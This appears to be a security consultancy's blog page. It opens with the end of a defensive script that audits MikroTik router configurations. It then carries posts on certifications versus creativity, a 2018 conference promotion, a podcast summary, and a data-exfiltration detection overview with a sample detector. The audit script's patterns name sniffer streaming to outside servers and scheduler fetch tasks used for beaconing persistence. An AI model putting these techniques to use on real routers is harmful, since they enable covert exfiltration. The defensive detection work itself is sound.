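    if any("action=deny" in ln and "dst-host=*" in ln for ln in s.get("/ip proxy access", [])):
        findings.append("proxy-denies-all-hosts")
    if enabled("/ip socks"):
        findings.append("socks4-proxy-enabled")
    for ln in s.get("/tool sniffer", []):
        if "streaming-enabled=yes" in ln:
            m = re.search(r"streaming-server=(\S+)", ln)
            findings.append("sniffer-streaming-to:" + (m.group(1) if m else "?"))
    # A scheduler entry that fetches an external URL is how the reported IP beaconing persisted.
    for ln in s.get("/system scheduler", []):
        if "/tool fetch" in ln and "url=" in ln:
            findings.append("scheduler-fetch-task:" + re.search(r"name=(\S+)", ln).group(1))
    return findings
```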

Reach out to my company Abstract Forward Consulting if you have questions.

In Cybersecurity There Are Two Kinds Of People: Those With Certs And Those Who Are Creative.

In cybersecurity there are two kinds of people: those with certifications and those who have proved they don’t need them. Just like degrees, certifications are only as good as the person holding them. If a person has a CISSP, a CISA, or another related certification, but does no more than attend the minimum continuing education to keep their certs in good standing, they will have little relevant security competence. Additionally, these certifications cannot be compared to a CPA, where the math and rules are clear and do not change at the speed of technology.

A person can show real-world cybersecurity competency by building and defending websites and applications, by attending many top cybersecurity conferences and leading some, by accurately following and blogging about threat actors (Brian Krebs), and by frequently speaking at security conferences – but more importantly, their content needs to be validated by other thought leaders.

 

This is not at all to say that degrees and certifications have no value, but it is to say they are hyped up and not for everyone, especially people like Steve Jobs, Bill Gates, Larry Ellison, Mark Zuckerberg, and about 95% (est) of real hackers and technology security makers. These people are so focused on the synergies of the technology and threats “in the now” that they do not focus on memorizing things for tests that will likely become obsolete in 2-4 years anyway.

The problem with standardized tests is that they teach conformity in a limited non-real-world context based on limited information with no accurate knowledge of the future. A standardized test cannot teach or confirm creativity, quality character, incident response savvy, backwards engineering, your ability to actually build and defend an application, your ability to lead and inspire people in the right direction, stress management, and most importantly that you understand the threat actor profile and landscape and can adapt on your feet.

Many people who study for a security certification realize it’s a memorization and buzzword test. Yes, it will prove you are not a “complete moron” in security, but it will prove no more, and it has nothing to do with creativity. Yet the best security protections must be creative because the enemy is. Hackers use creativity and new technology models to break into systems in ways not thought of before. Yet before they break into these systems they have to learn and reverse engineer them. They do this with a type of intelligence and experience-based creativity that is too high for any standardized test to confirm.

If you survey all the major data breaches and hacks to find out what caused them and what could have prevented them, it is never because an organization “needed more people with standardized security certifications”. Rather, it is usually due to: lack of creativity, corporate silos, office bureaucracy, turf wars (think why the FBI and CIA missed 9/11), poor communication, not enough real-world red teaming, failure to patch, poor internet hygiene education, failure to measure and prioritize risk, and incompetent security leaders who only hire their friends or people who conform to their biases.

If you really want to learn and stay updated about cybersecurity, grab your laptop or tablet and blog in real time at the Cybersecurity Summit in MN, 10/22/18 to 10/24/18 – register here. Blogging is important because it makes you write down what you are learning, and your followers will force you to talk more about what you’re posting, so you will learn more by defending or changing it. You must be an active learner by creating and supporting the web technology behind your website – 100%.

Also, when attending these events don’t be like most people and hang out only with your “established clique”. Meet new people and be open to diverse viewpoints, even ones that are hard to swallow – you grow more from that. Leave your assumptions at the door. Do not boast about the fact that you have an advanced degree or certification to someone else. You never know what the other person is capable of or has achieved. Remember, most hackers and the best technology people are unorthodox.

Here is a rundown of the amazing Cybersecurity Summit speakers.

  • Bruce Schneier, who will be signing copies of his forthcoming book “Click Here To Kill Everybody”
  • Chris Roberts, one of the world’s foremost experts on counter threat intelligence
  • Tony Sager, who leads the development of the CIS Critical Security Controls for the Center for Internet Security
  • Peter Brecl, Director of Managed Security Services at CenturyLink
  • Scott Borg, Director and Chief Economist at the U.S. Cyber Consequences Unit
  • Brian L. Levine, who recently engaged in the first criminal trial of a Chinese entity for trade secret theft that cost a U.S. company more than $1 billion
  • Tim Crothers, who built and leads the Cyber Fusion Center at Target

And many others!

To learn more and register for the event, go to www.cybersecuritysummit.org. Register now because prices will increase after Aug. 30. Come say hi to me at the event and reach out to my company Abstract Forward Consulting if you have questions.

Abstract Forward Podcast #1: Data Classification With Jim Danburg.

In this episode, renowned governance, risk and compliance (GRC) and critical infrastructure security and resiliency expert Jim Danburg joins us for a candid and thought-provoking conversation on data classification, including a funny story about doing a project for a CISO (chief information security officer). More specifically, we discuss the four types of data classification vs. only three, data over-classification, data mis-classification, governance risk and compliance, data security, role-based access control (RBAC), need-to-know policy, litigation discovery risk, the declining cost of data storage: disk vs. solid state, outsourcing data and PCI risk, mapping dependencies, the relationship between executives and data policy compliance, insider threat, bring your own device (BYOD) containerization: corporate vs. personal data with privacy implications, the secure destruction of data and hardware – and what it takes to improve all this!

Contact Abstract Forward Consulting here.

Disclaimer: This podcast does not represent the views of former or current employers and/or clients. This podcast will make every reasonable effort to verify facts and inferences therefrom. However, this podcast is intended to entertain and significantly inform its audience based on subjective, reason-based opinions. Non-public information will not be disclosed. Information obtained in this podcast may be materially out of date at or after the time of the podcast. This podcast is not legal, accounting, audit, health, technical, or financial advice. © Abstract Forward Consulting, LLC.

6 Pronged Approach to Data Exfiltration Detection

The best way to detect precursors to data exfiltration is to employ a six-pronged detection approach applied to all risk areas as far as practicable. Figure 1 shows the six-pronged detection approach.

Figure 1. Six-Pronged Data Exfiltration Precursor Detection Approach [1] [2].

1) Signature Based.

Characteristics: 1) Uses known pattern matching to signify attack; 2) Former zero days, known exploits, etc.

Advantages: 1) Widely available; 2) Most antivirus is based heavily on this; 3) Fairly fast; 4) Easy to implement; 5) Easy to update.

Disadvantages: 1) Cannot detect attacks for which it has no signature – zero days; 2) Does not catch insider threat.

2) Host Based.

Characteristics: 1) Runs on a single host; 2) Can analyze audit-trails, logs, the integrity of files and directories, etc.

Advantages: 1) More accurate than NIDS; 2) Less volume of traffic so less overhead.

Disadvantages: 1) Deployment is expensive; 2) No plan for if the host gets compromised – Real risk for organizations with more than 10 thousand employees.

3) Human Based [2].

Characteristics: 1) Has the unique experience set deriving intuition; 2) Has five senses.

Advantages: 1) Has the ability to learn multiple tools and connect the dots; 2) Can set team direction and inspire people; 3) Can think creatively; 4) Can think with the voice of the customer or recipient of a phishing e-mail.

Disadvantages: 1) Bias and ego; 2) Cannot calculate large numbers fast.

4) Anomaly Based.

Characteristics: 1) Uses statistical model or machine learning engine to characterize normal usage behaviors; 2) Requires big data and other software tools; 3) Recognizes departures from normal as potential intrusions.

Advantages: 1) Can detect attempts to exploit new and unforeseen vulnerabilities; 2) Can recognize authorized usage that falls outside the normal pattern.

Disadvantages: 1) Generally slower, more resource intensive compared to signature-based tools; 2) Greater complexity, difficult to configure; 3) Higher percentages of false alerts.

5) Network Based.

Characteristics: 1) A NIDS (network intrusion detection system) passively examines raw packets on the network and triggers alerts.

Advantages: 1) Easy deployment; 2) Unobtrusive; 3) Difficult to evade if done at the low level of network operation.

Disadvantages: 1) Fails open; 2) Different hosts process packets differently; 3) The NIDS needs to recreate the traffic as seen at the end host; 4) Needs the complete network topology and complete host behavior; 5) Which is highly unlikely to be available.

6) Externally Based.

Characteristics: 1) Studies show there are 258 externally measurable characteristics about network infrastructure (without any inside info).

Advantages: 1) Benchmarking – identifying mismanagement symptoms such as poorly configured DNS or BGP networks; 2) Benchmarking – identifying malicious activity, which mostly includes spam, phishing, and port scanning; 3) One study found it to be highly reliable in predicting breaches (90% true positives in a closed, limited test) [3].

Disadvantages: 1) It’s low-hanging fruit – only easy weaknesses are spotted; 2) Good I.T. audits and red teaming give similar results.
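To make the signature-based and anomaly-based prongs concrete, here is an added example (not from the cited sources) that runs both over constructed outbound-flow records; the hosts, ports and byte counts are made up. The anomaly baseline is fit on a separate clean history, because scoring a record against a baseline that already contains it masks the very outlier you are looking for, and a host with no history is reported rather than silently scored.

```python
import math
from collections import defaultdict

# Constructed sample flows: (host, dst_port, bytes_out). Not real data.
BASELINE_FLOWS = [
    ("ws01", 443, 12_000), ("ws01", 443, 15_000), ("ws01", 443, 11_000), ("ws01", 443, 13_000),
    ("ws02", 443, 9_000),  ("ws02", 443, 10_000), ("ws02", 443, 8_500),  ("ws02", 443, 9_500),
]
NEW_FLOWS = [
    ("ws01", 443, 14_000),     # normal for ws01
    ("ws02", 21, 4_000_000),   # cleartext FTP upload: known pattern AND huge for ws02
    ("ws02", 443, 900_000),    # HTTPS: no signature matches, only the baseline catches it
    ("ws09", 443, 5_000_000),  # host with no history: the anomaly engine cannot judge it
]

# Signature prong: a fixed table of patterns it already knows (cleartext FTP here).
SIGNATURE_PORTS = {21: "ftp-cleartext-upload", 20: "ftp-data-cleartext"}

def signature_alerts(flows):
    """Matches only what is in the signature table; everything else passes."""
    return [(h, SIGNATURE_PORTS[p]) for h, p, _ in flows if p in SIGNATURE_PORTS]

def fit_baseline(flows):
    """Per-host mean and standard deviation of bytes_out, from a clean history."""
    by_host = defaultdict(list)
    for h, _, b in flows:
        by_host[h].append(b)
    model = {}
    for h, vals in by_host.items():
        mean = sum(vals) / len(vals)
        std = math.sqrt(sum((v - mean) ** 2 for v in vals) / len(vals))
        # Floor the deviation so a perfectly flat history is not hypersensitive.
        model[h] = (mean, max(std, 0.05 * mean))
    return model

def anomaly_alerts(flows, model, z_threshold=3.0):
    """Anomaly prong: flags departures from each host's own baseline."""
    alerts = []
    for h, _, b in flows:
        if h not in model:
            alerts.append((h, "no-baseline", b))
            continue
        mean, std = model[h]
        z = (b - mean) / std
        if z > z_threshold:
            alerts.append((h, "bytes-out-anomaly", round(z, 1)))
    return alerts
```

Run side by side, the FTP upload is caught by both prongs, the large HTTPS transfer only by the baseline, and the unknown host by neither, which is why the page argues for layering the prongs rather than relying on one.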

[1] Dash, Debabrata. “Introduction to Network Security”. PowerPoint presentation, 2017.
[2] Photo of public figure Bruce Schneier by Per Ervland. https://www.schneier.com/, 2018.
[3] Liu, Yang; Sarabi, Armin; Zhang, Jing; Naghizadeh, Parinaz; Karir, Manish; Bailey, Michael; and Liu, Mingyan. “Cloudy with a Chance of Breach: Forecasting Cyber Security Incidents”. 2015, p. 1.